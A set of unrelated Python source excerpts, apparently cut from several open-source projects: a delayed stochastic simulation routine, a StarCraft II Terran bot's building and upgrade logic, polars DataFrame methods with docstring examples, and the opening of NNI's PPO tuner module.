self.delayed_consuming = list(set(delayed_reactions) - set(self.delayed_nonconsuming)) # Selects consuming reactions by: all_reaction - nonconsuming
self.HAS_DELAY_PARAMETERS = True
def DoDelayedStochSim(self, end=False, mode=False, method=False, trajectories=False, IsTrackPropensities=False, rate_selection = None, species_selection = None, IsOnlyLastTimepoint = False,quiet=False):
"""
Run a stochastic simulation with delayed reactions until `end` is reached. This can be either time steps or end time (which could be a *HUGE* number of steps).
Input:
- *end* [default=1000] simulation end (steps or time)
- *mode* [default='steps'] simulation mode, can be one of: ['steps','time']
- *method* [default='DelayedDirect'] stochastic algorithm ['DelayedDirect', 'DelayedNRM']
- *trajectories* [default = 1]
- *IsTrackPropensities* [default = False]
- *rate_selection* [default = None] List of names of rates to store. This saves memory space and prevents Memory Errors when propensities propensities are tracked
- *species_selection* [default = None] List of names of species to store. This saves memory space and prevents Memory Errors (occurring at ~15 species).
- *IsOnlyLastTimepoint* [default = False]
- *quiet* [default = False] suppress print statements
"""
if self._IsQuiet:
quiet = True
if method != False:
self.Method(method)
self._MethodSetBy = "DoStochSim"
elif self._MethodSetBy == "DoStochSim" and self.sim_method_name != "DelayedDirectMethod":
self.Method("DelayedDirect") # Default
if not self._IsDelayedMethod:
print("*** WARNING ***: an invalid method ({0}) was selected. Switching to the Delayed Direct Method.".format(self.sim_method_name))
self.Method('DelayedDirect') # = Default delayed method
if self.HAS_DELAY_PARAMETERS:
# Pass delay parameters to delayed SSA implementation.
self.SSA.distr_functions = copy.copy(self.delay_distributions)
self.SSA.distr_parameters = copy.copy(self.delay_distr_parameters)
self.SSA.reactions_Consuming = copy.copy(self.delayed_consuming)
self.SSA.reactions_NonConsuming = copy.copy(self.delayed_nonconsuming)
else:
raise AttributeError("No delay parameters have been set for the model '{0:s}'. First use the function .SetDelayParameters().".format(self.model_file)) #7-1-2014 exit if no delay parameters
# Specify that delayed method is set by this script. Prevents DoStochSim to select other method.
temp_MethodSetBy = self._MethodSetBy #Either "User" or "DoStochSim"
self._MethodSetBy = "Script"
#Perform Stochastic Simulation with given settings and method selected in
self.DoStochSim(end=end, mode=mode, method=False, trajectories=trajectories, IsTrackPropensities=IsTrackPropensities, rate_selection = rate_selection, species_selection = species_selection, IsOnlyLastTimepoint = IsOnlyLastTimepoint,quiet=quiet)
# Reset to original value
self._MethodSetBy = temp_MethodSetBy
if IsOnlyLastTimepoint and not quiet:
print('Info: not enough data points (are stored) to determine statistics.')
def SetPutativeReactionTimes(self, distributions):
"""
Sets the single molecule putative reaction times distribution.
Input:
- *distributions* (dict) with reaction name (or index) as key and distribution as value.
Value of *distributions* can be any distribution of numpy.random, e.g.:
- ('gamma', p1,p2) = | |
fac in self.structures(UnitTypeId.FACTORYFLYING).idle:
possible_land_positions_offset = sorted(
(Point2((x, y)) for x in range(-10, 10) for y in range(-10, 10)),
key=lambda point: point.x ** 2 + point.y ** 2,
)
offset_point: Point2 = Point2((-0.5, -0.5))
possible_land_positions = (fac.position.rounded + offset_point + p for p in possible_land_positions_offset)
for target_land_position in possible_land_positions:
if (
(await self.can_place(UnitTypeId.FACTORY, target_land_position))
and (await self.can_place(UnitTypeId.SUPPLYDEPOT, target_land_position + Point2((2.5, -0.5))))
):
fac(AbilityId.LAND, target_land_position)
break
"""
# Iterate through all landed starports, build reactors
for sp in self.structures(UnitTypeId.STARPORT).ready.idle:
if not sp.has_add_on:
if self.can_afford(UnitTypeId.STARPORTREACTOR):
addon_position: Point2 = sp.position + Point2((2.5, -0.5))
if (await self.can_place(UnitTypeId.SUPPLYDEPOT, addon_position)):
sp.build(UnitTypeId.STARPORTREACTOR)
else:
sp(AbilityId.LIFT) # Lift if addon will not fit
"""
# Iterate through all landed starports
for sp in self.structures(UnitTypeId.STARPORT).ready.idle:
if not sp.has_add_on and not self.enemy_units.closer_than(8, sp.position):
addon_position: Point2 = sp.position + Point2((2.5, -0.5))
if not (await self.can_place(UnitTypeId.SUPPLYDEPOT, addon_position)): sp(AbilityId.LIFT) # if an addon won't fit, lift
elif self.already_pending(UnitTypeId.STARPORTTECHLAB) + self.structures(UnitTypeId.STARPORTTECHLAB).ready.amount < 1: # no tech lab exists
if (
self.can_afford(UnitTypeId.STARPORTTECHLAB)
and len(self.units.of_type({MEDIVAC})) >= 1 # at least one medivac exists
):
sp.build(UnitTypeId.STARPORTTECHLAB) # build tech lab
else:
if self.can_afford(UnitTypeId.STARPORTREACTOR): sp.build(UnitTypeId.STARPORTREACTOR) # build reactor
# Find a spot for lifted starports to land
for sp in self.structures(UnitTypeId.STARPORTFLYING).idle:
possible_land_positions_offset = sorted(
(Point2((x, y)) for x in range(-10, 10) for y in range(-10, 10)),
key=lambda point: point.x ** 2 + point.y ** 2,
)
offset_point: Point2 = Point2((-0.5, -0.5))
possible_land_positions = (sp.position.rounded + offset_point + p for p in possible_land_positions_offset)
for target_land_position in possible_land_positions:
if (
(await self.can_place(UnitTypeId.STARPORT, target_land_position))
and (await self.can_place(UnitTypeId.SUPPLYDEPOT, target_land_position + Point2((2.5, -0.5))))
):
sp(AbilityId.LAND, target_land_position)
break
async def build_refineries(self):
if (
self.already_pending(UnitTypeId.REFINERY) + self.structures(UnitTypeId.REFINERY).ready.amount < self.get_ideal_building_count("REFINERY")
and self.can_afford(UnitTypeId.REFINERY)
):
for cc in self.townhalls:
geysers = self.vespene_geyser.closer_than(10, cc)
for geyser in geysers:
if self.gas_buildings.filter(lambda unit: unit.distance_to(geyser) < 1): # refinery already exists here
continue
worker: Unit = self.select_build_worker(geyser)
if worker is None:
continue
worker.build_gas(geyser)
break # so that it doesn't queue two refineries at once
async def build_depots(self):
depot_r1 = self.depot_r1 # TODO clean this up
depot_r2 = self.depot_r2
#print(depot_r1)
#print(depot_r2)
# self.depot_placement_positions is a set of two positions to build depots at (near the ramp)
if ( # if we want to build a depot...
self.can_afford(UnitTypeId.SUPPLYDEPOT)
and self.already_pending(UnitTypeId.SUPPLYDEPOT) < self.get_simultaneous_depot_count()
and self.supply_cap < 200
):
# elif len(self.depot_placement_positions) == 2:
if (
not self.structures.of_type({SUPPLYDEPOT, SUPPLYDEPOTLOWERED}) # no supply depots exist
or not depot_r1.closest(self.structures.of_type({SUPPLYDEPOT, SUPPLYDEPOTLOWERED})).distance_to(depot_r1) < 1 # not already a depot in this spot
):
# target_depot_location: Point2 = self.depot_placement_positions.pop() # pop location from list
target_depot_location = depot_r1
w = self.workers.collecting.closest_to(target_depot_location) # get nearby worker
w.build(UnitTypeId.SUPPLYDEPOT, target_depot_location) # nearby worker build depot at target location
print('just tried to build 1st depot')
elif not depot_r2.closest(self.structures.of_type({SUPPLYDEPOT, SUPPLYDEPOTLOWERED})).distance_to(depot_r2) < 1: # same for second depot
if ( # wall fast if being cheesed, otherwise wait until natural is started
self.beingcheesed
or (self.townhalls.amount >= self.get_ideal_building_count('COMMANDCENTER') and self.supply_army + self.supply_workers >= 21)
):
# self.main_base_ramp.corner_depots[0]
# target_depot_location: Point2 = self.depot_placement_positions.pop() # pop location from list
target_depot_location = depot_r2
w = self.workers.gathering.closest_to(target_depot_location) # get nearby worker TODO: switched collecting to gathering, will that fix bug?
w.build(UnitTypeId.SUPPLYDEPOT, target_depot_location) # nearby worker build depot at target location
print('just tried to build 2nd depot')
elif len(self.depot_placement_positions) == 0: # # other depots can go wherever
depot_pos = await self.find_placement(UnitTypeId.BARRACKS, near=self.townhalls.random.position.towards(self.game_info.map_center, 8))
w = self.workers.collecting.closest_to(depot_pos)
w.build(UnitTypeId.SUPPLYDEPOT, depot_pos)
# print('just tried to build another depot')
async def build_upgrade_buildings(self):
# Engineering Bays
if (
self.tech_requirement_progress(UnitTypeId.ENGINEERINGBAY) == 1
and self.already_pending(UnitTypeId.ENGINEERINGBAY) + self.structures(UnitTypeId.ENGINEERINGBAY).ready.amount < self.get_ideal_building_count("ENGINEERINGBAY")
):
if self.can_afford(UnitTypeId.ENGINEERINGBAY):
ebay_pos = await self.find_placement(UnitTypeId.ENGINEERINGBAY, near=self.townhalls.first.position.towards(self.game_info.map_center, -12))
w = self.workers.collecting.closest_to(ebay_pos)
w.build(UnitTypeId.ENGINEERINGBAY, ebay_pos)
#await self.build(UnitTypeId.ENGINEERINGBAY, near=self.townhalls.first.position.towards(self.game_info.map_center, -12))
# Armory
elif (
self.already_pending_upgrade(UpgradeId.TERRANINFANTRYWEAPONSLEVEL1) > 0.54
and self.already_pending(UnitTypeId.ENGINEERINGBAY) + self.structures(UnitTypeId.ENGINEERINGBAY).ready.amount > 1
and self.already_pending(UnitTypeId.ARMORY) + self.structures(UnitTypeId.ARMORY).ready.amount < 1
):
if self.can_afford(UnitTypeId.ARMORY):
armory_pos = await self.find_placement(UnitTypeId.ARMORY, near=self.townhalls.first.position.towards(self.game_info.map_center, -12))
w = self.workers.collecting.closest_to(armory_pos)
w.build(UnitTypeId.ARMORY, armory_pos)
#await self.build(UnitTypeId.ARMORY, near=self.townhalls.first.position.towards(self.game_info.map_center, -12))
async def build_missile_turrets(self):
# TODO: only build forward turret if there are no enemy ground units nearby
fwd_turret_pos = self.sorted_expo_locations[1].towards(self.game_info.map_center, 16)
if (
self.tech_requirement_progress(UnitTypeId.MISSILETURRET) == 1
and not self.already_pending(UnitTypeId.MISSILETURRET)
and not self.structures(UnitTypeId.MISSILETURRET).closer_than(4, fwd_turret_pos)
):
w = self.workers.collecting.closest_to(fwd_turret_pos)
w.build(UnitTypeId.MISSILETURRET, fwd_turret_pos)
#await self.build(UnitTypeId.MISSILETURRET, fwd_turret_pos)
elif (
self.tech_requirement_progress(UnitTypeId.MISSILETURRET) == 1
and self.already_pending(UnitTypeId.ENGINEERINGBAY) + self.structures(UnitTypeId.ENGINEERINGBAY).ready.amount > 1 # more than 1 ebay exists or in production
and self.already_pending(UnitTypeId.MISSILETURRET) + self.structures(UnitTypeId.MISSILETURRET).ready.amount < (self.townhalls.amount + 1) # less than (th + 1) missile turrets
and self.already_pending(UnitTypeId.MISSILETURRET) - self.structures(UnitTypeId.MISSILETURRET).not_ready.amount < 1 # no more than 1 queued but not started
):
for cc in self.townhalls:
if (
not self.structures(UnitTypeId.MISSILETURRET).closer_than(9, cc.position) # this CC does not have a nearby turret
and self.can_afford(UnitTypeId.MISSILETURRET)
):
turret_pos = await self.find_placement(UnitTypeId.MISSILETURRET, near=cc.position.towards(self.game_info.map_center, -4))
w = self.workers.collecting.closest_to(turret_pos)
w.build(UnitTypeId.MISSILETURRET, turret_pos)
#await self.build(UnitTypeId.MISSILETURRET, near=cc.position.towards(self.game_info.map_center, -4))
async def upgrade_command_center(self):
# returns
for cc in self.structures(UnitTypeId.COMMANDCENTER).ready.idle:
abilities = await self.get_available_abilities(cc)
if AbilityId.UPGRADETOORBITAL_ORBITALCOMMAND in abilities:
if self.can_afford(AbilityId.UPGRADETOORBITAL_ORBITALCOMMAND):
cc(AbilityId.UPGRADETOORBITAL_ORBITALCOMMAND)
else:
return("cant_afford") # would otherwise do
async def manage_orbital_energy(self):
for cc in self.structures(UnitTypeId.ORBITALCOMMAND).ready:
abilities = await self.get_available_abilities(cc)
if AbilityId.SCANNERSWEEP_SCAN in abilities and cc.energy >= 50: # TODO: scan
pass
if AbilityId.CALLDOWNMULE_CALLDOWNMULE in abilities and cc.energy >= 50: # TODO: save energy for scans
cc(AbilityId.CALLDOWNMULE_CALLDOWNMULE, self.get_mule_target())
async def finish_constructing_buildings(self):
#if self.units.structure.not_ready.amount > constructingscvcount:
for building in self.structures.not_ready: # for each unfinished building
if "TechLab" in building.name or "Reactor" in building.name: continue # ignore addons
isbuilding = False
for worker in self.workers: # iterate through every worker
if worker.is_constructing_scv and worker.distance_to(building) < 3.1: # this worker is constructing this building
isbuilding = True
break # stop looking through workers
if not isbuilding: # if no workers are constructing this unfinished building
if self.enemy_units.closer_than(8, building):
building(AbilityId.CANCEL_BUILDINPROGRESS)
elif self.workers:
newworker = self.workers.gathering.random
newworker.smart(building)
#await self.do_actions(newworker(SMART,building))
"""
if self.units.structure.not_ready.amount > self.units(SCV).is_constructing_scv.amount: # if there is an unfinished building
print("---------> a building is not finished !")
for building in self.units.structure.not_ready: # for each unfinished building
if not self.units(SCV).is_constructing_scv.closer_than(2,building): # if this building is not being constructed
ws = self.workers.gathering
w = ws.random
await self.do_actions(w(SMART,building))
"""
async def repair_damaged_buildings(self):
for building in self.structures.ready:
if building.health_percentage < 1 and building.health_percentage > 0.05:
repairingworkers = 0
for worker in self.workers.closer_than(3, building.position):
if worker.is_repairing and worker.order_target == building.tag:
repairingworkers += 1
if repairingworkers < 3 and self.workers.gathering:
self.workers.gathering.closest_to(building.position).smart(building)
async def research_upgrades(self):
for ebay in self.structures(UnitTypeId.ENGINEERINGBAY).ready.idle:
abilities = await self.get_available_abilities(ebay)
if AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL1 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL1):
ebay.research(UpgradeId.TERRANINFANTRYWEAPONSLEVEL1)
elif AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL2 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL2):
ebay.research(UpgradeId.TERRANINFANTRYWEAPONSLEVEL2)
elif AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL3 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYWEAPONSLEVEL3):
ebay.research(UpgradeId.TERRANINFANTRYWEAPONSLEVEL3)
elif AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL1 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL1):
ebay.research(UpgradeId. TERRANINFANTRYARMORSLEVEL1)
elif AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL2 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL2):
ebay.research(UpgradeId. TERRANINFANTRYARMORSLEVEL2)
elif AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL3 in abilities and self.can_afford(AbilityId.ENGINEERINGBAYRESEARCH_TERRANINFANTRYARMORLEVEL3):
ebay.research(UpgradeId. TERRANINFANTRYARMORSLEVEL3)
for raxlab in self.structures(UnitTypeId.BARRACKSTECHLAB).ready.idle:
abilities = await self.get_available_abilities(raxlab)
if ( # Stimpack
AbilityId.BARRACKSTECHLABRESEARCH_STIMPACK in abilities
and self.can_afford(AbilityId.BARRACKSTECHLABRESEARCH_STIMPACK)
and self.already_pending(UnitTypeId.FACTORY) + self.structures(UnitTypeId.FACTORY).ready.amount > 0
):
raxlab.research(UpgradeId.STIMPACK)
elif ( # Combat Shield
AbilityId.RESEARCH_COMBATSHIELD in abilities
and self.can_afford(AbilityId.RESEARCH_COMBATSHIELD)
and self.already_pending(UnitTypeId.FACTORY) + self.structures(UnitTypeId.FACTORY).ready.amount > 0
):
raxlab.research(UpgradeId.SHIELDWALL) # why the hell is it UpgradeId.SHIELDWALL while UpgradeId.COMBATSHIELD is an entirely different thing?
elif ( # Concussive Shells
AbilityId.RESEARCH_CONCUSSIVESHELLS in abilities
and self.can_afford(AbilityId.BARRACKSTECHLABRESEARCH_STIMPACK)
and self.can_afford(AbilityId.RESEARCH_CONCUSSIVESHELLS)
):
raxlab.research(UpgradeId.PUNISHERGRENADES)
async def raise_lower_depots(self):
prox_threshold = 15
# depots will lower when the closest non-flying enemy unit is closer than this threshold
lowered_depots = self.structures.of_type(SUPPLYDEPOTLOWERED)
raised_depots = self.structures.of_type(SUPPLYDEPOT)
# if lowered_depots: # consider raising them
for depot in lowered_depots:
if self.enemy_units.filter(lambda u: not u.is_flying):
closest_enemy = self.enemy_units.filter(lambda u: not u.is_flying).closest_to(depot) # the non-flying enemy unit that is closest to the depot
if closest_enemy and depot.distance_to(closest_enemy) < prox_threshold: # enemies getting close
depot(AbilityId.MORPH_SUPPLYDEPOT_RAISE)
for depot in raised_depots:
if self.enemy_units.filter(lambda u: not u.is_flying):
closest_enemy = self.enemy_units.filter(lambda u: not u.is_flying).closest_to(depot)
#closest_enemy = Units([u for u in self.enemy_units if not u.is_flying]).closest_to(depot)
if closest_enemy and depot.distance_to(closest_enemy) > prox_threshold: # enemies getting farther away
depot(AbilityId.MORPH_SUPPLYDEPOT_LOWER)
else:
depot(AbilityId.MORPH_SUPPLYDEPOT_LOWER)
"""
self.depots: Units = self.structures.of_type({UnitTypeId.SUPPLYDEPOT, UnitTypeId.SUPPLYDEPOTLOWERED})
if self.depots:
self.depot_placement_positions: Set[Point2] = {
d for d in self.depot_placement_positions if self.depots.closest_distance_to(d) > 1
}
# Lower depos when no enemies are nearby
for depot in self.structures(UnitTypeId.SUPPLYDEPOT).ready:
for unit in self.enemy_units:
if self.townhalls.amount == 1 and unit.distance_to(depot) < 15 and not unit.is_flying:
pass
elif unit.distance_to(depot) < 10 and | |
Optional[float] = None,
with_replacement: bool = False,
shuffle: bool = False,
seed: Optional[int] = None,
) -> DF:
"""
Sample from this DataFrame by setting either `n` or `frac`.
Parameters
----------
n
Number of samples < self.len() .
frac
Fraction between 0.0 and 1.0 .
with_replacement
Sample with replacement.
shuffle
Shuffle the order of sampled data points.
seed
Initialization seed. If None is given a random seed is used.
Examples
--------
>>> df = pl.DataFrame(
... {
... "foo": [1, 2, 3],
... "bar": [6, 7, 8],
... "ham": ["a", "b", "c"],
... }
... )
>>> df.sample(n=2, seed=0) # doctest: +IGNORE_RESULT
shape: (2, 3)
┌─────┬─────┬─────┐
│ foo ┆ bar ┆ ham │
│ --- ┆ --- ┆ --- │
│ i64 ┆ i64 ┆ str │
╞═════╪═════╪═════╡
│ 3 ┆ 8 ┆ c │
├╌╌╌╌╌┼╌╌╌╌╌┼╌╌╌╌╌┤
│ 2 ┆ 7 ┆ b │
└─────┴─────┴─────┘
"""
if n is not None and frac is not None:
raise ValueError("n and frac were both supplied")
if n is None and frac is not None:
return self._from_pydf(
self._df.sample_frac(frac, with_replacement, shuffle, seed)
)
if n is None:
n = 1
return self._from_pydf(self._df.sample_n(n, with_replacement, shuffle, seed))
def fold(
self, operation: Callable[["pli.Series", "pli.Series"], "pli.Series"]
) -> "pli.Series":
"""
Apply a horizontal reduction on a DataFrame. This can be used to effectively
determine aggregations on a row level, and can be applied to any DataType that
can be supercasted (casted to a similar parent type).
An example of the supercast rules when applying an arithmetic operation on two DataTypes are for instance:
Int8 + Utf8 = Utf8
Float32 + Int64 = Float32
Float32 + Float64 = Float64
Examples
--------
A horizontal sum operation:
>>> df = pl.DataFrame(
... {
... "a": [2, 1, 3],
... "b": [1, 2, 3],
... "c": [1.0, 2.0, 3.0],
... }
... )
>>> df.fold(lambda s1, s2: s1 + s2)
shape: (3,)
Series: 'a' [f64]
[
4
5
9
]
A horizontal minimum operation:
>>> df = pl.DataFrame({"a": [2, 1, 3], "b": [1, 2, 3], "c": [1.0, 2.0, 3.0]})
>>> df.fold(lambda s1, s2: s1.zip_with(s1 < s2, s2))
shape: (3,)
Series: 'a' [f64]
[
1
1
3
]
A horizontal string concatenation:
>>> df = pl.DataFrame(
... {
... "a": ["foo", "bar", 2],
... "b": [1, 2, 3],
... "c": [1.0, 2.0, 3.0],
... }
... )
>>> df.fold(lambda s1, s2: s1 + s2)
shape: (3,)
Series: 'a' [str]
[
"foo11.0"
"bar22.0"
null
]
A horizontal boolean or, similar to a row-wise .any():
>>> df = pl.DataFrame(
... {
... "a": [False, False, True],
... "b": [False, True, False],
... }
... )
>>> df.fold(lambda s1, s2: s1 | s2)
shape: (3,)
Series: 'a' [bool]
[
false
true
true
]
Parameters
----------
operation
function that takes two `Series` and returns a `Series`.
"""
acc = self.to_series(0)
for i in range(1, self.width):
acc = operation(acc, self.to_series(i))
return acc
def row(self, index: int) -> Tuple[Any]:
"""
Get a row as tuple.
Parameters
----------
index
Row index.
Examples
--------
>>> df = pl.DataFrame(
... {
... "foo": [1, 2, 3],
... "bar": [6, 7, 8],
... "ham": ["a", "b", "c"],
... }
... )
>>> df.row(2)
(3, 8, 'c')
"""
return self._df.row_tuple(index)
def rows(self) -> List[Tuple]:
"""
Convert columnar data to rows as python tuples.
Examples
--------
>>> df = pl.DataFrame(
... {
... "a": [1, 3, 5],
... "b": [2, 4, 6],
... }
... )
>>> df.rows()
[(1, 2), (3, 4), (5, 6)]
"""
return self._df.row_tuples()
@overload
def shrink_to_fit(self: DF, in_place: Literal[False] = ...) -> DF:
...
@overload
def shrink_to_fit(self, in_place: Literal[True]) -> None:
...
@overload
def shrink_to_fit(self: DF, in_place: bool) -> Optional[DF]:
...
def shrink_to_fit(self: DF, in_place: bool = False) -> Optional[DF]:
"""
Shrink memory usage of this DataFrame to fit the exact capacity needed to hold the data.
"""
if in_place:
self._df.shrink_to_fit()
return None
else:
df = self.clone()
df._df.shrink_to_fit()
return df
def hash_rows(
self, k0: int = 0, k1: int = 1, k2: int = 2, k3: int = 3
) -> "pli.Series":
"""
Hash and combine the rows in this DataFrame.
Hash value is UInt64.
Parameters
----------
k0
seed parameter
k1
seed parameter
k2
seed parameter
k3
seed parameter
Examples
--------
>>> df = pl.DataFrame(
... {
... "foo": [1, 2, 3],
... "bar": [6, 7, 8],
... "ham": ["a", "b", "c"],
... }
... )
>>> df.hash(k0=42) # doctest: +SKIP
shape: (3,)
Series: '' [u64]
[
1208206736888326229
8040480609798856146
18282897888575762835
]
"""
return pli.wrap_s(self._df.hash_rows(k0, k1, k2, k3))
def interpolate(self: DF) -> DF:
"""
Interpolate intermediate values. The interpolation method is linear.
Examples
--------
>>> df = pl.DataFrame(
... {
... "foo": [1, None, 9, 10],
... "bar": [6, 7, 9, None],
... "baz": [1, None, None, 9],
... }
... )
>>> df.interpolate()
shape: (4, 3)
┌─────┬──────┬─────┐
│ foo ┆ bar ┆ baz │
│ --- ┆ --- ┆ --- │
│ i64 ┆ i64 ┆ i64 │
╞═════╪══════╪═════╡
│ 1 ┆ 6 ┆ 1 │
├╌╌╌╌╌┼╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 5 ┆ 7 ┆ 3 │
├╌╌╌╌╌┼╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 9 ┆ 9 ┆ 6 │
├╌╌╌╌╌┼╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 10 ┆ null ┆ 9 │
└─────┴──────┴─────┘
"""
return self.select(pli.col("*").interpolate())
def is_empty(self) -> bool:
"""
Check if the dataframe is empty
Examples
--------
>>> df = pl.DataFrame({"foo": [1, 2, 3], "bar": [4, 5, 6]})
>>> df.filter(pl.col("foo") > 99).is_empty()
True
"""
return self.height == 0
def to_struct(self, name: str) -> "pli.Series":
"""
Convert a ``DataFrame`` to a ``Series`` of type ``Struct``
Parameters
----------
name
Name for the struct Series
Examples
--------
>>> df = pl.DataFrame(
... {
... "a": [1, 2, 3, 4, 5],
... "b": ["one", "two", "three", "four", "five"],
... }
... )
>>> df.to_struct("nums")
shape: (5,)
Series: 'nums' [struct[2]{'a': i64, 'b': str}]
[
{1,"one"}
{2,"two"}
{3,"three"}
{4,"four"}
{5,"five"}
]
"""
return pli.wrap_s(self._df.to_struct(name))
def unnest(self: DF, names: Union[str, List[str]]) -> DF:
"""
Decompose a struct into its fields. The fields will be inserted in to the `DataFrame` on the
location of the `struct` type.
Parameters
----------
names
Names of the struct columns that will be decomposed by its fields
Examples
--------
>>> df = (
... pl.DataFrame(
... {
... "int": [1, 2],
... "str": ["a", "b"],
... "bool": [True, None],
... "list": [[1, 2], [3]],
... }
... )
... .to_struct("my_struct")
... .to_frame()
... )
>>> df
shape: (2, 1)
┌─────────────────────────────┐
│ my_struct │
│ --- │
│ struct[4]{'int',...,'list'} │
╞═════════════════════════════╡
│ {1,"a",true,[1, 2]} │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ {2,"b",null,[3]} │
└─────────────────────────────┘
>>> df.unnest("my_struct")
shape: (2, 4)
┌─────┬─────┬──────┬────────────┐
│ int ┆ str ┆ bool ┆ list │
│ --- ┆ --- ┆ --- ┆ --- │
│ i64 ┆ str ┆ bool ┆ list [i64] │
╞═════╪═════╪══════╪════════════╡
│ 1 ┆ a ┆ true ┆ [1, 2] │
├╌╌╌╌╌┼╌╌╌╌╌┼╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2 ┆ b ┆ null ┆ [3] │
└─────┴─────┴──────┴────────────┘
"""
if isinstance(names, str):
names = [names]
return self._from_pydf(self._df.unnest(names))
class RollingGroupBy(Generic[DF]):
"""
A rolling grouper. This has an `.agg` method which will allow you to run all polars expressions
in a groupby context.
"""
def __init__(
self,
df: DF,
index_column: str,
period: str,
offset: Optional[str],
closed: str = "none",
by: Optional[Union[str, List[str], "pli.Expr", List["pli.Expr"]]] = None,
):
self.df = df
self.time_column = index_column
self.period = period
self.offset = offset
self.closed = closed
self.by = by
def agg(
self,
column_to_agg: Union[
List[Tuple[str, List[str]]],
Dict[str, Union[str, List[str]]],
List["pli.Expr"],
"pli.Expr",
],
) -> DF:
return (
self.df.lazy()
.groupby_rolling(
self.time_column, self.period, self.offset, self.closed, self.by
)
.agg(column_to_agg) # type: ignore[arg-type]
.collect(no_optimization=True, string_cache=False)
)
class DynamicGroupBy(Generic[DF]):
"""
A dynamic grouper. This has an `.agg` method which will allow you to run all polars expressions
in a groupby context.
"""
def __init__(
self,
df: DF,
index_column: str,
every: str,
period: Optional[str],
offset: Optional[str],
truncate: bool = True,
include_boundaries: bool = True,
closed: str = "none",
by: Optional[Union[str, List[str], "pli.Expr", List["pli.Expr"]]] = None,
):
self.df = df
self.time_column = index_column
| |
<reponame>farziengineer/nni<filename>src/sdk/pynni/nni/ppo_tuner/ppo_tuner.py<gh_stars>0
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge,
# to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
ppo_tuner.py including:
class PPOTuner
"""
import os
os.environ["CUDA_VISIBLE_DEVICES"] = ""
import copy
import logging
import numpy as np
import json_tricks
from gym import spaces
import nni
from nni.tuner import Tuner
from nni.utils import OptimizeMode, extract_scalar_reward
from .model import Model
from .util import set_global_seeds
from .policy import build_lstm_policy
logger = logging.getLogger('ppo_tuner_AutoML')
def constfn(val):
"""wrap as function"""
def f(_):
return val
return f
class ModelConfig:
"""
Configurations of the PPO model
"""
def __init__(self):
self.observation_space = None
self.action_space = None
self.num_envs = 0
self.nsteps = 0
self.ent_coef = 0.0
self.lr = 3e-4
self.vf_coef = 0.5
self.max_grad_norm = 0.5
self.gamma = 0.99
self.lam = 0.95
self.cliprange = 0.2
self.embedding_size = None # the embedding is for each action
self.noptepochs = 4 # number of training epochs per update
self.total_timesteps = 5000 # number of timesteps (i.e. number of actions taken in the environment)
self.nminibatches = 4 # number of training minibatches per update. For recurrent policies,
# should be smaller or equal than number of environments run in parallel.
class TrialsInfo:
"""
Informations of each trial from one model inference
"""
def __init__(self, obs, actions, values, neglogpacs, dones, last_value, inf_batch_size):
self.iter = 0
self.obs = obs
self.actions = actions
self.values = values
self.neglogpacs = neglogpacs
self.dones = dones
self.last_value = last_value
self.rewards = None
self.returns = None
self.inf_batch_size = inf_batch_size
#self.states = None
def get_next(self):
"""
get actions of the next trial
"""
if self.iter >= self.inf_batch_size:
return None, None
actions = []
for step in self.actions:
actions.append(step[self.iter])
self.iter += 1
return self.iter - 1, actions
def update_rewards(self, rewards, returns):
"""
after the trial is finished, reward and return of this trial is updated
"""
self.rewards = rewards
self.returns = returns
def convert_shape(self):
"""
convert shape
"""
def sf01(arr):
"""
swap and then flatten axes 0 and 1
"""
s = arr.shape
return arr.swapaxes(0, 1).reshape(s[0] * s[1], *s[2:])
self.obs = sf01(self.obs)
self.returns = sf01(self.returns)
self.dones = sf01(self.dones)
self.actions = sf01(self.actions)
self.values = sf01(self.values)
self.neglogpacs = sf01(self.neglogpacs)
class PPOModel:
"""
PPO Model
"""
def __init__(self, model_config, mask):
self.model_config = model_config
self.states = None # initial state of lstm in policy/value network
self.nupdates = None # the number of func train is invoked, used to tune lr and cliprange
self.cur_update = 1 # record the current update
self.np_mask = mask # record the mask of each action within one trial
set_global_seeds(None)
assert isinstance(self.model_config.lr, float)
self.lr = constfn(self.model_config.lr)
assert isinstance(self.model_config.cliprange, float)
self.cliprange = constfn(self.model_config.cliprange)
# build lstm policy network, value share the same network
policy = build_lstm_policy(model_config)
# Get the nb of env
nenvs = model_config.num_envs
# Calculate the batch_size
